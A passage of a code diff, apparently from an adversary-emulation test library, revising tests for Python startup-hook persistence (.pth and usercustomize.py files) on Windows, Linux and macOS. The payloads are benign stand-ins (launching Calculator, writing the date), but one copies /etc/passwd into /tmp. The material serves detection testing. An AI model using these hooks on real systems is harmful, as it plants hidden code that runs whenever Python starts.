+          \nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
+          -Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
+          -Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
   T1037.003:
     technique:
       type: attack-pattern

atomics/T1546.018/T1546.018.md

@@ -12,22 +12,27 @@ Adversaries may abuse these mechanisms to establish persistence on systems where
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Python Startup Hook Execution via .pth (Windows)](#atomic-test-1---python-startup-hook-execution-via-pth-windows)
+- [Atomic Test #1 - Python Startup Hook - atomic_hook.pth (Windows)](#atomic-test-1---python-startup-hook---atomic_hookpth-windows)
 
-- [Atomic Test #2 - Python Startup Hook Execution via .pth (Linux)](#atomic-test-2---python-startup-hook-execution-via-pth-linux)
+- [Atomic Test #2 - Python Startup Hook - usercustomize.py (Windows)](#atomic-test-2---python-startup-hook---usercustomizepy-windows)
 
-- [Atomic Test #3 - Python Startup Hook Execution via .pth (macOS)](#atomic-test-3---python-startup-hook-execution-via-pth-macos)
+- [Atomic Test #3 - Python Startup Hook - atomic_hook.pth (Linux)](#atomic-test-3---python-startup-hook---atomic_hookpth-linux)
+
+- [Atomic Test #4 - Python Startup Hook - atomic_hook.pth (macOS)](#atomic-test-4---python-startup-hook---atomic_hookpth-macos)
+
+- [Atomic Test #5 - Python Startup Hook - usercustomize.py (Linux / MacOS)](#atomic-test-5---python-startup-hook---usercustomizepy-linux--macos)
 
 
 <br/>
 
-## Atomic Test #1 - Python Startup Hook Execution via .pth (Windows)
-Creates a Python startup hook using a .pth file inside a virtual environment on Windows.
+## Atomic Test #1 - Python Startup Hook - atomic_hook.pth (Windows)
+Executes code by placing a .pth file in the site-packages directory. 
+Supports python.exe and python3.exe via input arguments.
 
 **Supported Platforms:** Windows
 
 
-**auto_generated_guid:** b4773c6b-3aa0-44a2-830a-b6ff594a0fb2
+**auto_generated_guid:** 57289962-21dc-4501-b756-80cd30608d9f
 
 
 
@@ -36,44 +41,43 @@ Creates a Python startup hook using a .pth file inside a virtual environment on
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| exe_name | Executable to launch | string | calc.exe|
-| python_path | Path to Python interpreter | path | python.exe|
+| python_exe | The python binary name to test. | String | python.exe|
 
 
 #### Attack Commands: Run with `powershell`! 
 
 
 ```powershell
-$TempDir = Join-Path $env:TEMP ("atomic_python_hook_" + [guid]::NewGuid())
-New-Item -ItemType Directory -Path $TempDir | Out-Null
-Set-Location $TempDir
-Set-Content -Path "$env:TEMP\atomic_python_hook_path.txt" -Value $TempDir
-& "#{python_path}" -m venv env
+$TempDir = Join-Path $env:TEMP "atomic_pth_win"
+New-Item -ItemType Directory -Path $TempDir -Force
+& "#{python_exe}" -m venv "$TempDir\env"
 $SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
-"import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['#{exe_name}']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
-& "$TempDir\env\Scripts\python.exe" -c "print('Interpreter started')"
+"import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
+Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
+& "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
 ```
 
 #### Cleanup Commands:
 ```powershell
-Get-Process CalculatorApp -ErrorAction SilentlyContinue | Stop-Process -Force
-if (Test-Path "$env:TEMP\atomic_python_hook_path.txt") {
-  $TempDir = Get-Content "$env:TEMP\atomic_python_hook_path.txt"
-  Remove-Item -Recurse -Force $TempDir -ErrorAction SilentlyContinue
-  Remove-Item "$env:TEMP\atomic_python_hook_path.txt" -Force }
+if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
+Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
+Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
+Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+Write-Host "[+] Successfully Terminated Calculator"
 ```
 
 
 
 #### Dependencies:  Run with `powershell`!
-##### Description: Ensure Python is installed
+##### Description: Python must be installed and the specified binary (#{python_exe}) must be in the PATH.
 ##### Check Prereq Commands:
 ```powershell
-if (Get-Command #{python_path} -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
+if (Get-Command @("#{python_exe}", 'python3.exe') -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
-Write-Host "Python not found. Please install it from https://www.python.org/downloads/windows/ or via 'winget install Python.Python.3'"
+Write-Host "[!] Python3 not found. Please install Python3 (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/) or ensure it is in your PATH."
 ```
 
 
@@ -82,13 +86,14 @@ Write-Host "Python not found. Please install it from https://www.python.org/down
 <br/>
 <br/>
 
-## Atomic Test #2 - Python Startup Hook Execution via .pth (Linux)
-Creates a Python startup hook using a .pth file inside a virtual environment on Linux.
+## Atomic Test #2 - Python Startup Hook - usercustomize.py (Windows)
+Executes code via usercustomize.py. This is a per-user persistence mechanism 
+that does not require Administrative privileges.
 
-**Supported Platforms:** Linux
+**Supported Platforms:** Windows
 
 
-**auto_generated_guid:** 85f21c19-18ef-4450-98d8-05bb7b0e1887
+**auto_generated_guid:** 05cc7a2c-ce32-46f2-a358-f27f76718c39
 
 
 
@@ -97,38 +102,44 @@ Creates a Python startup hook using a .pth file inside a virtual environment on
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| python_path | Path to Python interpreter | path | python3|
+| python_exe | The python binary name to test | String | python.exe|
 
 
-#### Attack Commands: Run with `bash`! 
+#### Attack Commands: Run with `powershell`! 
 
 
-```bash
-PYTHON_EXE=$(command -v #{python_path})
-TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XXXXXX)
-echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
-$PYTHON_EXE -m venv "$TEMPDIR/env"
-SITE_PACKAGES=$("$TEMPDIR/env/bin/python" -c "import site; print(site.getsitepackages()[0])")
-echo "import sys, os; (not hasattr(sys, 'hook_run')) and (setattr(sys, 'hook_run', True) or os.system('cat /etc/passwd'))" > "$SITE_PACKAGES/atomic_hook.pth"
-"$TEMPDIR/env/bin/python" -c "print('Interpreter started')"
+```powershell
+$UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
+if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
+"import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
+Get-ChildItem -Path "$UserDir"
+& "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
 ```
 
 #### Cleanup Commands:
-```bash
-rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
+```powershell
+$PyBin = if (Get-Command "#{python_exe}" -ErrorAction SilentlyContinue) { "#{python_exe}" } elseif (Get-Command "python3.exe" -ErrorAction SilentlyContinue) { "python3.exe" } else { "python.exe" }; 
+$UserDir = & $PyBin -S -c "import site; print(site.getusersitepackages())"
+if (-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue | Where-Object Name -like 'usercustomize*')) { Write-Host "[!] Artifact missing: $UserDir\usercustomize.py - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
+Get-ChildItem -Path "$UserDir" -Recurse -Force |
+Where-Object { $_.Name -like "usercustomize*" } |
+Remove-Item -Force 
+Write-Host "[+] Successfully Removed usercustomize.py under $UserDir"
+Get-Process -Name "Calc*", "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+Write-Host "[+] Successfully Terminated Calculator"
 ```
 
 
 
-#### Dependencies:  Run with `bash`!
-##### Description: Ensure Python is installed
+#### Dependencies:  Run with `powershell`!
+##### Description: Python must be installed and the specified binary (#{python_exe}) must be in the PATH.
 ##### Check Prereq Commands:
-```bash
-command -v
+```powershell
+if (Get-Command @("#{python_exe}", 'python3.exe') -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```bash
-echo "Python3 not found. Please install it using your package manager (e.g., 'sudo apt install python3' or 'sudo yum install python3')."
+```powershell
+Write-Host "[!] Python3 not found. Please install Python3 (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/) or ensure it is in your PATH."
 ```
 
 
@@ -137,13 +148,76 @@ echo "Python3 not found. Please install it using your package manager (e.g., 'su
 <br/>
 <br/>
 
-## Atomic Test #3 - Python Startup Hook Execution via .pth (macOS)
+## Atomic Test #3 - Python Startup Hook - atomic_hook.pth (Linux)
+Executes code by creating atomic_hook.pth in the site-packages directory. 
+This script runs automatically for every user on the system when Python starts.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** a58c066d-f2f0-42a2-ab70-30af73f89e66
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| python_exe | The python binary name to test | String | python3|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+TEMPDIR="/tmp/atomic_sitecust_posix"
+mkdir -p "$TEMPDIR"
+"#{python_exe}" -m venv "$TEMPDIR/env"
+SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
+ls -la "$SITE_PACKAGES/atomic_hook.pth"
+"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
+```
+
+#### Cleanup Commands:
+```sh
+if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+rm -rf /tmp/atomic_sitecust_posix
+echo "[+] Successful Removed atomic_hook.pth"
+rm -rf /tmp/atomic_hook_poc.txt
+echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Python must be installed and the specified binary (#{python_exe}) must be in the PATH.
+##### Check Prereq Commands:
+```sh
+PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+$PYTHON_CMD -m venv --help >/dev/null 2>&1
+```
+##### Get Prereq Commands:
+```sh
+echo "Python not found. Please install Python using your package manager (e.g., Debian Based 'sudo apt-get update && sudo apt-get install -y python3 python3-venv', RedHat / CentOS Based 'sudo yum install -y python3 python3-venv || sudo dnf install -y python3 python3-venv')."
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Python Startup Hook - atomic_hook.pth (macOS)
 Creates a Python startup hook using a .pth file inside a virtual environment on macOS.
 
 **Supported Platforms:** macOS
 
 
-**auto_generated_guid:** 858b4aed-d76f-443d-a801-5454ea56dee0
+**auto_generated_guid:** 28ca4f81-fa96-47ff-8555-dde98017e89b
 
 
 
@@ -153,39 +227,106 @@ Creates a Python startup hook using a .pth file inside a virtual environment on
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_name | App to launch | string | Calculator|
-| python_path | Path to Python interpreter | path | python3|
+| python_exe | The python binary name to test | string | python3|
 
 
-#### Attack Commands: Run with `bash`! 
+#### Attack Commands: Run with `sh`! 
 
 
-```bash
-PYTHON_EXE=$(command -v #{python_path})
-TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XXXXXX)
+```sh
+PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
 echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
 $PYTHON_EXE -m venv "$TEMPDIR/env"
-SITE_PACKAGES=$("$TEMPDIR/env/bin/python" -c "import site; print(site.getsitepackages()[0])")
+SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
 echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
-"$TEMPDIR/env/bin/python" -c "print('Interpreter started')"
+"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
 ```
 
 #### Cleanup Commands:
-```bash
+```sh
+if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
 pkill "#{exe_name}" || true
 [ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
+echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
 ```
 
 
 
-#### Dependencies:  Run with `bash`!
-##### Description: Ensure Python is installed
+#### Dependencies:  Run with `sh`!
+##### Description: Python must be installed and the specified binary (#{python_exe}) must be in the PATH.
 ##### Check Prereq Commands:
-```bash
-command -v
+```sh
+PYTHON_CMD=$(command -v python || command -v #{python_exe})
+if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+$PYTHON_CMD -m venv --help >/dev/null 2>&1
 ```
 ##### Get Prereq Commands:
-```bash
-echo "Python3 not found. Please install it using Homebrew ('brew install python') or the macOS developer tools ('xcode-select --install')."
+```sh
+echo "Python3 not found. Please install it using Homebrew ('brew install python' or 'brew install python3 or brew install python@3.X') or the macOS developer tools ('xcode-select --install')."
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Python Startup Hook - usercustomize.py (Linux / MacOS)
+Executes code via usercustomize.py. This is a per-user persistence mechanism 
+that does not require root privileges.
+
+**Supported Platforms:** Linux, macOS
+
+
+**auto_generated_guid:** 6e78084a-a433-4702-a838-cc7b765d87e8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| python_exe | The python binary name to test | String | python3|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+mkdir -p "$USER_PACKAGES"
+echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+```
+
+#### Cleanup Commands:
+```sh
+PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+rm -rf /tmp/poc.txt
+echo "[+] Successful remove poc.txt under /tmp"
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Python must be installed and the specified binary (#{python_exe}) must be in the PATH.
+##### Check Prereq Commands:
+```sh
+PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+$PYTHON_CMD -m venv --help >/dev/null 2>&1
+```
+##### Get Prereq Commands:
+```sh
+echo "Python not found. Please install Python using your package manager (e.g., Debian Based 'sudo apt-get update && sudo apt-get install -y python3 python3-venv', RedHat / CentOS Based 'sudo yum install -y python3 python3-venv || sudo dnf install -y python3 python3-venv', MacOS brew install python3 or brew install python@3.x or the macOS developer tools ('xcode-select --install'))."
 ```
 
 

atomics/T1546.018/T1546.018.yaml

@@ -2,6 +2,7 @@ attack_technique: T1546.018
 display_name: 'Event Triggered Execution: Python Startup Hooks'
 atomic_tests:
   - name: Python Startup Hook - atomic_hook.pth (Windows)
+    auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
     description: |
       Executes code by placing a .pth file in the site-packages directory. 
       Supports python.exe and python3.exe via input arguments.
@@ -40,6 +41,7 @@ atomic_tests:
         Write-Host "[+] Successfully Terminated Calculator"
 
   - name: Python Startup Hook - usercustomize.py (Windows)
+    auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
     description: |
       Executes code via usercustomize.py. This is a per-user persistence mechanism 
       that does not require Administrative privileges.
@@ -79,6 +81,7 @@ atomic_tests:
         Write-Host "[+] Successfully Terminated Calculator"
 
   - name: Python Startup Hook - atomic_hook.pth (Linux)
+    auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
     description: |
       Executes code by creating atomic_hook.pth in the site-packages directory. 
       This script runs automatically for every user on the system when Python starts.
@@ -119,6 +122,7 @@ atomic_tests:
         echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
 
   - name: Python Startup Hook - atomic_hook.pth (macOS)
+    auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
     description: |
       Creates a Python startup hook using a .pth file inside a virtual environment on macOS.
     supported_platforms:
@@ -159,6 +163,7 @@ atomic_tests:
         echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
         
   - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+    auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
     description: |
       Executes code via usercustomize.py. This is a per-user persistence mechanism 
       that does not require root privileges.

atomics/used_guids.txt

@@ -1790,3 +1790,8 @@ b4773c6b-3aa0-44a2-830a-b6ff594a0fb2
 85f21c19-18ef-4450-98d8-05bb7b0e1887
 858b4aed-d76f-443d-a801-5454ea56dee0
 44315fb0-f78d-4cef-b10f-cf21c1fe2c75
+57289962-21dc-4501-b756-80cd30608d9f
+05cc7a2c-ce32-46f2-a358-f27f76718c39
+a58c066d-f2f0-42a2-ab70-30af73f89e66
+28ca4f81-fa96-47ff-8555-dde98017e89b
+6e78084a-a433-4702-a838-cc7b765d87e8